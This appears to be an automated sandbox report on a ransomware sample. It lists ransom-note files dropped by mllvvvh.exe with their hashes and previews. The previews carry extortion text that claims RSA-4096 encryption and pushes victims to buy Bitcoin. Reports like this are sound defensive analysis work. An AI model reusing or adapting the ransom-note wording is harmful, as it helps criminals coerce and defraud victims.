                  SHA-512:CB1CCAC5FECD3D7EA0D7A1B95AB3B64C929E7D64C04B5CAA7960F6CD562BCED92546B93773915FD8BF6DFA2B236D83598726C1D30384AC0B1AD3787FA3795A19
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_Microsoft.Window_b187e4484c4831a1fe7677975c9505e17d6a36e_76d002fb_15c637df\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):15712
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:192:Ougzr9JkhTfb8ofVStugzr9JkhTfb8ofVS+:az5mBbxfVSnz5mBbxfVS+
                  MD5:71640E12BAA04701BC3AD888422AEC09
                  SHA1:E76E5C8E636F0791C52255BF74DC52E0E1DABF92
                  SHA-256:CB5CC24925D723920339507CCE0E97D12E61F2DC2EFA666270ACE4846D9F8C70
                  SHA-512:E74BC1D69023BC860D962814B05D29BFECCE3760846AED040B8876996853F039C42779686102FE34939C152C925E317CD0E1199527C67135C0A48A8BAAD79065
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_Microsoft.Window_b187e4484c4831a1fe7677975c9505e17d6a36e_76d002fb_15c637df\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):135504
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:3072:xgs4ZxIYrTgjoikRSb2nHO0bb1Vgs4ZxIYrTgjoikRSb2nHO0bb1T:xrYcoik4C7bDrYcoik4C7bl
                  MD5:ADE91B3D90BBB431FE72CF998A1FF282
                  SHA1:BA6908764ADDD0497E5D575975496933944769C4
                  SHA-256:10B883E4076F78D35F1BEFEF45F3B1CA39CA49D972E9C6D43C021A4BA869BA68
                  SHA-512:D5666DAF07B4F817777A1B0CCD65299CCACF284646C38ACE9BA4B66A2A80556ECCC2D097293E8B971F4F6349CC8CB8C5458E99D31BF395627C9206E909ECFF32
                  Malicious:false
                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_Microsoft.Window_b187e4484c4831a1fe7677975c9505e17d6a36e_76d002fb_15c637df\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):4194
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:96:E1ItqgY1L3SoUj6BtR1ItqgY1L3SoUj6Bti:E1Itk5yj6p1Itk5yj66
                  MD5:E69AB2813BAB6256E4906DC1313E43A8
                  SHA1:D112351D88FEC3B8FEC6682641FEE9EF71FC4000
                  SHA-256:0C6B6836F1BA67C32AE833ADD5DAB6F70A5C87B93EB8E38FDB531F3D615215BD
                  SHA-512:CB1CCAC5FECD3D7EA0D7A1B95AB3B64C929E7D64C04B5CAA7960F6CD562BCED92546B93773915FD8BF6DFA2B236D83598726C1D30384AC0B1AD3787FA3795A19
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_Microsoft.Window_b187e4484c4831a1fe7677975c9505e17d6a36e_76d002fb_15c63aad\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):15712
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:192:Ougzr9JkhTfb8ofVStugzr9JkhTfb8ofVS+:az5mBbxfVSnz5mBbxfVS+
                  MD5:71640E12BAA04701BC3AD888422AEC09
                  SHA1:E76E5C8E636F0791C52255BF74DC52E0E1DABF92
                  SHA-256:CB5CC24925D723920339507CCE0E97D12E61F2DC2EFA666270ACE4846D9F8C70
                  SHA-512:E74BC1D69023BC860D962814B05D29BFECCE3760846AED040B8876996853F039C42779686102FE34939C152C925E317CD0E1199527C67135C0A48A8BAAD79065
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_Microsoft.Window_b187e4484c4831a1fe7677975c9505e17d6a36e_76d002fb_15c63aad\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):135504
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:3072:xgs4ZxIYrTgjoikRSb2nHO0bb1Vgs4ZxIYrTgjoikRSb2nHO0bb1T:xrYcoik4C7bDrYcoik4C7bl
                  MD5:ADE91B3D90BBB431FE72CF998A1FF282
                  SHA1:BA6908764ADDD0497E5D575975496933944769C4
                  SHA-256:10B883E4076F78D35F1BEFEF45F3B1CA39CA49D972E9C6D43C021A4BA869BA68
                  SHA-512:D5666DAF07B4F817777A1B0CCD65299CCACF284646C38ACE9BA4B66A2A80556ECCC2D097293E8B971F4F6349CC8CB8C5458E99D31BF395627C9206E909ECFF32
                  Malicious:false
                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_Microsoft.Window_b187e4484c4831a1fe7677975c9505e17d6a36e_76d002fb_15c63aad\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):4194
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:96:E1ItqgY1L3SoUj6BtR1ItqgY1L3SoUj6Bti:E1Itk5yj6p1Itk5yj66
                  MD5:E69AB2813BAB6256E4906DC1313E43A8
                  SHA1:D112351D88FEC3B8FEC6682641FEE9EF71FC4000
                  SHA-256:0C6B6836F1BA67C32AE833ADD5DAB6F70A5C87B93EB8E38FDB531F3D615215BD
                  SHA-512:CB1CCAC5FECD3D7EA0D7A1B95AB3B64C929E7D64C04B5CAA7960F6CD562BCED92546B93773915FD8BF6DFA2B236D83598726C1D30384AC0B1AD3787FA3795A19
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_Microsoft.Window_b187e4484c4831a1fe7677975c9505e17d6a36e_76d002fb_15c63faf\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):15712
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:192:Ougzr9JkhTfb8ofVStugzr9JkhTfb8ofVS+:az5mBbxfVSnz5mBbxfVS+
                  MD5:71640E12BAA04701BC3AD888422AEC09
                  SHA1:E76E5C8E636F0791C52255BF74DC52E0E1DABF92
                  SHA-256:CB5CC24925D723920339507CCE0E97D12E61F2DC2EFA666270ACE4846D9F8C70
                  SHA-512:E74BC1D69023BC860D962814B05D29BFECCE3760846AED040B8876996853F039C42779686102FE34939C152C925E317CD0E1199527C67135C0A48A8BAAD79065
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_Microsoft.Window_b187e4484c4831a1fe7677975c9505e17d6a36e_76d002fb_15c63faf\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):135504
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:3072:xgs4ZxIYrTgjoikRSb2nHO0bb1Vgs4ZxIYrTgjoikRSb2nHO0bb1T:xrYcoik4C7bDrYcoik4C7bl
                  MD5:ADE91B3D90BBB431FE72CF998A1FF282
                  SHA1:BA6908764ADDD0497E5D575975496933944769C4
                  SHA-256:10B883E4076F78D35F1BEFEF45F3B1CA39CA49D972E9C6D43C021A4BA869BA68
                  SHA-512:D5666DAF07B4F817777A1B0CCD65299CCACF284646C38ACE9BA4B66A2A80556ECCC2D097293E8B971F4F6349CC8CB8C5458E99D31BF395627C9206E909ECFF32
                  Malicious:false
                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_Microsoft.Window_b187e4484c4831a1fe7677975c9505e17d6a36e_76d002fb_15c63faf\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):4194
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:96:E1ItqgY1L3SoUj6BtR1ItqgY1L3SoUj6Bti:E1Itk5yj6p1Itk5yj66
                  MD5:E69AB2813BAB6256E4906DC1313E43A8
                  SHA1:D112351D88FEC3B8FEC6682641FEE9EF71FC4000
                  SHA-256:0C6B6836F1BA67C32AE833ADD5DAB6F70A5C87B93EB8E38FDB531F3D615215BD
                  SHA-512:CB1CCAC5FECD3D7EA0D7A1B95AB3B64C929E7D64C04B5CAA7960F6CD562BCED92546B93773915FD8BF6DFA2B236D83598726C1D30384AC0B1AD3787FA3795A19
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_Microsoft.Window_b187e4484c4831a1fe7677975c9505e17d6a36e_76d002fb_15c64442\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):15712
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:192:Ougzr9JkhTfb8ofVStugzr9JkhTfb8ofVS+:az5mBbxfVSnz5mBbxfVS+
                  MD5:71640E12BAA04701BC3AD888422AEC09
                  SHA1:E76E5C8E636F0791C52255BF74DC52E0E1DABF92
                  SHA-256:CB5CC24925D723920339507CCE0E97D12E61F2DC2EFA666270ACE4846D9F8C70
                  SHA-512:E74BC1D69023BC860D962814B05D29BFECCE3760846AED040B8876996853F039C42779686102FE34939C152C925E317CD0E1199527C67135C0A48A8BAAD79065
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_Microsoft.Window_b187e4484c4831a1fe7677975c9505e17d6a36e_76d002fb_15c64442\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):135504
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:3072:xgs4ZxIYrTgjoikRSb2nHO0bb1Vgs4ZxIYrTgjoikRSb2nHO0bb1T:xrYcoik4C7bDrYcoik4C7bl
                  MD5:ADE91B3D90BBB431FE72CF998A1FF282
                  SHA1:BA6908764ADDD0497E5D575975496933944769C4
                  SHA-256:10B883E4076F78D35F1BEFEF45F3B1CA39CA49D972E9C6D43C021A4BA869BA68
                  SHA-512:D5666DAF07B4F817777A1B0CCD65299CCACF284646C38ACE9BA4B66A2A80556ECCC2D097293E8B971F4F6349CC8CB8C5458E99D31BF395627C9206E909ECFF32
                  Malicious:false
                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_Microsoft.Window_b187e4484c4831a1fe7677975c9505e17d6a36e_76d002fb_15c64442\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):4194
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:96:E1ItqgY1L3SoUj6BtR1ItqgY1L3SoUj6Bti:E1Itk5yj6p1Itk5yj66
                  MD5:E69AB2813BAB6256E4906DC1313E43A8
                  SHA1:D112351D88FEC3B8FEC6682641FEE9EF71FC4000
                  SHA-256:0C6B6836F1BA67C32AE833ADD5DAB6F70A5C87B93EB8E38FDB531F3D615215BD
                  SHA-512:CB1CCAC5FECD3D7EA0D7A1B95AB3B64C929E7D64C04B5CAA7960F6CD562BCED92546B93773915FD8BF6DFA2B236D83598726C1D30384AC0B1AD3787FA3795A19
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_Microsoft.Window_b187e4484c4831a1fe7677975c9505e17d6a36e_76d002fb_15c648c7\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):15712
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:192:Ougzr9JkhTfb8ofVStugzr9JkhTfb8ofVS+:az5mBbxfVSnz5mBbxfVS+
                  MD5:71640E12BAA04701BC3AD888422AEC09
                  SHA1:E76E5C8E636F0791C52255BF74DC52E0E1DABF92
                  SHA-256:CB5CC24925D723920339507CCE0E97D12E61F2DC2EFA666270ACE4846D9F8C70
                  SHA-512:E74BC1D69023BC860D962814B05D29BFECCE3760846AED040B8876996853F039C42779686102FE34939C152C925E317CD0E1199527C67135C0A48A8BAAD79065
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_Microsoft.Window_b187e4484c4831a1fe7677975c9505e17d6a36e_76d002fb_15c648c7\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):135504
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:3072:xgs4ZxIYrTgjoikRSb2nHO0bb1Vgs4ZxIYrTgjoikRSb2nHO0bb1T:xrYcoik4C7bDrYcoik4C7bl
                  MD5:ADE91B3D90BBB431FE72CF998A1FF282
                  SHA1:BA6908764ADDD0497E5D575975496933944769C4
                  SHA-256:10B883E4076F78D35F1BEFEF45F3B1CA39CA49D972E9C6D43C021A4BA869BA68
                  SHA-512:D5666DAF07B4F817777A1B0CCD65299CCACF284646C38ACE9BA4B66A2A80556ECCC2D097293E8B971F4F6349CC8CB8C5458E99D31BF395627C9206E909ECFF32
                  Malicious:false
                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_Microsoft.Window_b187e4484c4831a1fe7677975c9505e17d6a36e_76d002fb_15c648c7\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):4194
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:96:E1ItqgY1L3SoUj6BtR1ItqgY1L3SoUj6Bti:E1Itk5yj6p1Itk5yj66
                  MD5:E69AB2813BAB6256E4906DC1313E43A8
                  SHA1:D112351D88FEC3B8FEC6682641FEE9EF71FC4000
                  SHA-256:0C6B6836F1BA67C32AE833ADD5DAB6F70A5C87B93EB8E38FDB531F3D615215BD
                  SHA-512:CB1CCAC5FECD3D7EA0D7A1B95AB3B64C929E7D64C04B5CAA7960F6CD562BCED92546B93773915FD8BF6DFA2B236D83598726C1D30384AC0B1AD3787FA3795A19
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_Microsoft.Window_b187e4484c4831a1fe7677975c9505e17d6a36e_76d002fb_15c64be4\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):15712
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:192:Ougzr9JkhTfb8ofVStugzr9JkhTfb8ofVS+:az5mBbxfVSnz5mBbxfVS+
                  MD5:71640E12BAA04701BC3AD888422AEC09
                  SHA1:E76E5C8E636F0791C52255BF74DC52E0E1DABF92
                  SHA-256:CB5CC24925D723920339507CCE0E97D12E61F2DC2EFA666270ACE4846D9F8C70
                  SHA-512:E74BC1D69023BC860D962814B05D29BFECCE3760846AED040B8876996853F039C42779686102FE34939C152C925E317CD0E1199527C67135C0A48A8BAAD79065
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_Microsoft.Window_b187e4484c4831a1fe7677975c9505e17d6a36e_76d002fb_15c64be4\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):135504
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
